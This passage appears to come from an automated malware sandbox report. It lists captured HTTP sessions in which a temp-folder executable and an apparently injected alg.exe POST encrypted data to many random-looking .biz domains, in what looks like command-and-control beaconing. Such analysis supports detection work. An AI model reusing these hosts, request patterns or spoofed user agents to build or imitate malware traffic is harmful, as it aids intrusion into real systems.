Data Raw: 17 ec 14 52 65 f8 49 e7 36 03 00 00 2f a2 89 8a 32 c6 46 3c 97 ab e8 75 fd 63 5e d6 3b a1 fc cd 66 e8 84 bd 13 56 88 ca 80 f2 20 d5 2b c8 dc d6 19 c0 ea aa 3a ac 48 8c 6b bd 01 1d e3 87 33 a2 93 17 32 d5 1c e6 63 b3 1c 9b 08 ab 2d 02 9e 60 1f 2e
Data Ascii: ReI6/2F<uc^;fV +:Hk32c-`.kwe%y/SIbEsfs`M0|vm{hQO}-|P^q44t^-sOUi4'.FQVR_@5SE?Z["};KdsJ
Nov 26, 2024 08:14:54.551651001 CET | 407 bytes | IN
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:14:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ed6322541279954a75eccc533b702fbf|8.46.123.75|1732605294|1732605294|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
50          192.168.2.10  50031        3.94.10.34      80                6072  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:54.182830095 CET  359                OUT        POST /qkmbmbtlinurxa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:14:54.182858944 CET  778                OUT        Data Raw: dd 3c ae 9b 3a 97 7f be fe 02 00 00 a4 d0 72 5a 91 28 d2 ce dd ca 86 6a a5 99 3a 96 69 13 66 cd 17 11 76 07 78 79 26 06 f6 68 1e 95 ac bb 9b 14 d9 95 3c 0f 1f 66 22 c0 b9 71 8b 1b ae f7 35 a0 9e f1 55 79 dd 01 35 eb 67 4c 23 fe e3 f6 49 fe 81 b9
Data Ascii: <:rZ(j:ifvxy&h<f"q5Uy5gL#I%<ohOV?*[9;G%1.Yq@"Q=qeU}0]pxTBSg[@X_13)RB4e]=woNr8)}GE.
Nov 26, 2024 08:14:55.325854063 CET  411                IN         HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:14:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5f76781d8912ef9c37ae12f12fb24dc5|8.46.123.75|1732605295|1732605295|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
51          192.168.2.10  50032        208.100.26.245  80                7892  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:54.867569923 CET  355                OUT        POST /mhnfavogqkp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:14:54.867599010 CET  834                OUT        Data Raw: 3a 7c 65 8b a6 24 f0 a9 36 03 00 00 d4 8b c9 5f 80 35 22 3e 65 c7 31 6f dc 35 07 ae cb 4a f6 31 37 1a 42 75 cc f4 0f 35 96 3d 79 f5 21 1e 9f 8c 5b 1d 80 75 97 c0 ee 23 12 a6 91 16 bb f4 9d 7a d1 fb 49 4a 88 a0 a2 02 a8 a4 a5 9a b4 34 c4 5f ad 00
Data Ascii: :|e$6_5">e1o5J17Bu5=y![u#zIJ4_"cjpbBQDvjKlH3!v_`c,M/bk{/#?j!(#O\Uih(%'Te$tO$fww1I9~+~=Gj
Nov 26, 2024 08:14:56.086076975 CET  744                IN         HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 26 Nov 2024 07:14:55 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    52192.168.2.1050033165.160.15.20806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.603490114 CET351OUTPOST /omaxykiwlg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.603517056 CET778OUTData Raw: 49 b1 27 ab 9d bd 29 6e fe 02 00 00 ce 6c 51 4a a5 d6 54 b3 f8 91 31 81 7c e5 8f 43 33 a6 36 80 16 68 00 13 88 44 47 ce 48 90 ae 87 18 a8 29 98 df e2 d7 8f b2 bc c1 7a 60 f2 21 80 d9 13 7d 53 23 bc e3 f2 f6 f2 07 ba d0 70 a1 3e 79 87 02 e8 97 63
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: I')nlQJT1|C36hDGH)z`!}S#p>ychzkmjo)_* NlQ }l{L\t+haa!7-fai8e`!Tm(RqYn,A{@ a]B\q,oT-eB2
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.906814098 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:56 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.909790993 CET342OUTPOST /b HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.909827948 CET778OUTData Raw: a0 81 8d d0 83 ea 61 61 fe 02 00 00 ae 76 79 b6 37 39 f6 f8 8f 81 45 1a 79 ce 49 b3 3e 63 4d a9 91 46 f5 26 62 3d 64 0c 61 8b 41 fb 25 ba 33 27 aa c6 12 14 d5 6b ed ba 8d 45 9b b2 4b 23 fb 18 9a 31 3e ff 48 f4 ca 08 78 f2 8a 4f 46 90 67 69 0d e9
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: aavy79EyI>cMF&b=daA%3'kEK#1>HxOFgiUH_O6RXf>P*(vJy"/0>d>jt*MO/[r[T=k\.mHyg1mNXIx5m=uHi&l@
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.322197914 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:57 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
53          192.168.2.10  50034        208.100.26.245  80                7892  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:56.282088041 CET  356                OUT        POST /mggqfmrkiurp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gytujflc.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:14:56.282118082 CET  834                OUT        Data Raw: fb 64 6a 89 c7 b0 b6 4f 36 03 00 00 4c a3 6e 69 82 e4 68 53 d8 31 b9 bb cc 1e 29 8d 4d f4 40 a9 2b 92 29 0b 62 d7 9a d1 70 86 9d 83 52 90 72 99 62 00 b0 69 eb 00 43 45 3e ea 49 9d 62 b1 a7 ac 4e cd a5 d3 bd 43 44 f9 63 9c cf dd 98 21 18 80 61 05
Nov 26, 2024 08:14:57.448985100 CET  744                IN         HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 26 Nov 2024 07:14:57 GMT
    Content-Type: text/html
    Content-Length: 580
    Connection: keep-alive
    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
54          192.168.2.10  50035        13.251.16.150   80                7892  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:57.875519991 CET  350                OUT        POST /elpkfqto HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: qaynky.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:14:57.875581026 CET  834                OUT        Data Raw: df a8 3e dc 51 b8 22 33 36 03 00 00 26 ad 8f 8e ca 7c a5 34 42 2a c4 48 2a 73 af 3c ac ea 17 4f 49 2c 9a bb bd ee ba 57 e6 0d 82 05 ba 03 27 f8 91 9f cb f5 73 7e 4b fe 99 16 cf 64 83 1e ad 47 34 5a bd 0f 22 aa 39 85 85 81 e0 34 0d 7f a9 9f eb 1a
Nov 26, 2024 08:14:59.976989985 CET  408                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:14:59 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8b8de84560c63effbaf68631ad3719f4|8.46.123.75|1732605299|1732605299|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
55          192.168.2.10  50036        54.244.188.177  80                6072  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:58.017720938 CET  355                OUT        POST /mvjuawquor HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: oshhkdluh.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:14:58.017738104 CET  778                OUT        Data Raw: 79 18 53 0b 98 03 fe 05 fe 02 00 00 c2 54 df 0c fa 8e e9 68 5b 5f a8 63 d2 9d 7e f4 99 f6 7d 87 c5 7c 89 9d 26 b0 b4 92 71 1b 78 e3 38 25 74 d5 dd 69 78 84 fd 7f 38 52 96 e8 53 df 78 d8 da 4d 34 84 c4 0e f3 1f d4 04 7d 1b 3a 55 5a 03 5b 56 14 61
Nov 26, 2024 08:14:59.463737965 CET  411                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:14:59 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=89654e70dcd545263643e4ffd751c9a8|8.46.123.75|1732605299|1732605299|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
56          192.168.2.10  50037        208.100.26.245  80                6072  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:15:00.254658937 CET  344                OUT        POST /y HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: yunalwv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:15:00.254739046 CET  778                OUT        Data Raw: 44 23 7f ed cf 98 1f 53 fe 02 00 00 30 e7 38 04 89 77 78 43 ed 58 19 ed 9f 9b 6a 71 9b 5c fa 32 a1 eb 89 7f 25 69 4d a3 63 09 98 cb c0 b1 8b 3e b0 ef dd a4 a6 2c c3 00 fa f7 86 25 21 12 3a 55 6c cb 40 26 2b c2 cd cf 1f 7e cc 52 f1 53 86 7b fa 22
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: D#S08wxCXjq\2%iMc>,%!:Ul@&+~RS{"%hAR*M"0Go]`iPnt(omK2l/eY*6B0P{mD2K7=K"{sNU7>^c`s`lc}a):`e"JC3EYESF
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.423175097 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.425856113 CET356OUTPOST /sltbypkjutmqd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.425915956 CET778OUTData Raw: cc f2 de 74 57 aa e7 ff fe 02 00 00 b9 cd 3d 05 9e 5a 84 ea dc e4 f1 0e 6e 66 b1 4e ff d5 e7 08 29 d0 45 9b 8d 02 db e0 eb 83 56 e6 fc 0b 0b 16 51 d6 15 ad 98 23 a8 e2 be 44 eb 37 e7 e3 6f 66 dd 86 ef d0 2e 7a 0e 0b 8c 0e 66 1d 1e b0 7a 01 6e 69
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tW=ZnfN)EVQ#D7of.zfzniVX95TH<-VHuk%-+zXz[oa8Z3B p^q,iAxHrg'=|"!-.x(`**4PhU/D :I-AhJ]EGw>RJ
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.770710945 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 57 | Source IP: 192.168.2.10 | Source Port: 50038 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:00.276310921 CET | 350 | OUT | POST /xqvmg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:00.276422024 CET | 834 | OUT | Data Raw / Data Ascii: [834-byte binary request body, not reproduced]
Nov 26, 2024 08:15:01.376210928 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3b8c66003cfd6cab4e27ec3ea1d11941|8.46.123.75|1732605301|1732605301|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 58 | Source IP: 192.168.2.10 | Source Port: 50039 | Destination IP: 54.244.188.177 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:01.682318926 CET | 349 | OUT | POST /risgh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:01.683294058 CET | 834 | OUT | Data Raw / Data Ascii: [834-byte binary request body, not reproduced]
Nov 26, 2024 08:15:03.034835100 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=85c59b87e4f81c3b267f08c4109150e8|8.46.123.75|1732605302|1732605302|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.10 | 50040 | 34.211.97.45 | 80 | 6072 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:02.762713909 CET | 342 | OUT | POST /j HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: jpskm.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:15:02.762759924 CET | 778 | OUT | Data Raw: 70 76 e1 19 38 f5 1f 72 fe 02 00 00 c7 be 52 23 a3 59 58 11 bb bc 28 1b d9 7e d8 d4 94 57 85 20 1d d6 17 78 c9 4c 40 5c 14 d6 50 dd e6 00 19 10 f3 18 b0 2d c8 2d 3c a0 27 b7 4f 24 f7 ab 36 10 64 85 ff 97 95 2c 28 b4 4b 72 18 e0 1b 9e 9f 2d fb 11
